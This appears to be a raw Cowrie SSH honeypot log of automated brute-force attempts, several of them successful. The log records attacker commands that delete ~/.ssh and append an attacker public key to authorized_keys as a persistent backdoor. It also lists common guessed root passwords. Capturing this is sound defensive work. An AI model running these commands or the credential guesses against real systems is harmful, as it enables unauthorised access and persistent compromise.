{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.317259Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.317811Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53550,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f78d9adbe3","protocol":"ssh","message":"New connection: 212.227.235.229:53550 (1.2.3.4:22) [session: f0f78d9adbe3]","sensor":"my-vps","timestamp":"2025-09-09T06:50:52.569635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:52.571137Z","src_ip":"212.227.235.229","session":"f0f78d9adbe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:52.698832Z","src_ip":"212.227.235.229","session":"f0f78d9adbe3"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":44770,"dst_ip":"1.2.3.4","dst_port":22,"session":"5babf8b36bf5","protocol":"ssh","message":"New connection: 118.26.39.178:44770 (1.2.3.4:22) [session: 5babf8b36bf5]","sensor":"my-vps","timestamp":"2025-09-09T06:50:53.170544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:53.171808Z","src_ip":"118.26.39.178","session":"5babf8b36bf5"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"Welcome1","message":"login attempt [gbase/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:53.207120Z","src_ip":"212.227.235.229","session":"f0f78d9adbe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:53.426969Z","src_ip":"118.26.39.178","session":"5babf8b36bf5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:54.329103Z","src_ip":"212.227.235.229","session":"f0f78d9adbe3"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"muhamad2025","message":"login attempt [muhamad/muhamad2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:54.493226Z","src_ip":"118.26.39.178","session":"5babf8b36bf5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:55.753129Z","src_ip":"118.26.39.178","session":"5babf8b36bf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48140,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0558d420c5","protocol":"ssh","message":"New connection: 212.227.235.229:48140 (1.2.3.4:22) [session: ec0558d420c5]","sensor":"my-vps","timestamp":"2025-09-09T06:50:59.829394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:59.830508Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:00.074558Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:01.246269Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.login.success","username":"root","password":"toor@123","message":"login attempt [root/toor@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:51:01.664484Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:51:02.205889Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:51:02.206772Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:51:02.207761Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:02.452115Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:51:03.005364Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.006082Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.251033Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.251954Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48814,"dst_ip":"1.2.3.4","dst_port":22,"session":"53720d5f0ace","protocol":"ssh","message":"New connection: 212.227.235.229:48814 (1.2.3.4:22) [session: 53720d5f0ace]","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.494361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.495459Z","src_ip":"212.227.235.229","session":"53720d5f0ace"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:03.739376Z","src_ip":"212.227.235.229","session":"53720d5f0ace"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:51:04.758678Z","src_ip":"212.227.235.229","session":"53720d5f0ace"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:06.006187Z","src_ip":"212.227.235.229","session":"53720d5f0ace"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49358,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f36d36dc0d8","protocol":"ssh","message":"New connection: 212.227.235.229:49358 (1.2.3.4:22) [session: 0f36d36dc0d8]","sensor":"my-vps","timestamp":"2025-09-09T06:51:06.245644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:06.246611Z","src_ip":"212.227.235.229","session":"0f36d36dc0d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:06.489105Z","src_ip":"212.227.235.229","session":"0f36d36dc0d8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:51:07.502639Z","src_ip":"212.227.235.229","session":"0f36d36dc0d8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:07.756872Z","src_ip":"212.227.235.229","session":"0f36d36dc0d8"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:07.757720Z","src_ip":"212.227.235.229","session":"ec0558d420c5"}
{"eventid":"cowrie.login.success","username":"root","password":"6969","message":"login attempt [root/6969] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:51:40.107591Z","src_ip":"150.241.115.7","session":"b41963740261"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:51:40.128160Z","src_ip":"150.241.115.7","session":"b41963740261"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":52720,"dst_ip":"1.2.3.4","dst_port":22,"session":"010c01c903db","protocol":"ssh","message":"New connection: 157.20.207.165:52720 (1.2.3.4:22) [session: 010c01c903db]","sensor":"my-vps","timestamp":"2025-09-09T06:51:48.386595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:48.387456Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:48.571174Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome@12345","message":"login attempt [root/Welcome@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:51:49.348565Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:51:49.775821Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:51:49.776516Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:51:49.777814Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:49.963045Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:51:50.346453Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.347196Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.532861Z","src_ip":"157.20.207.165","session":"010c01c903db"}
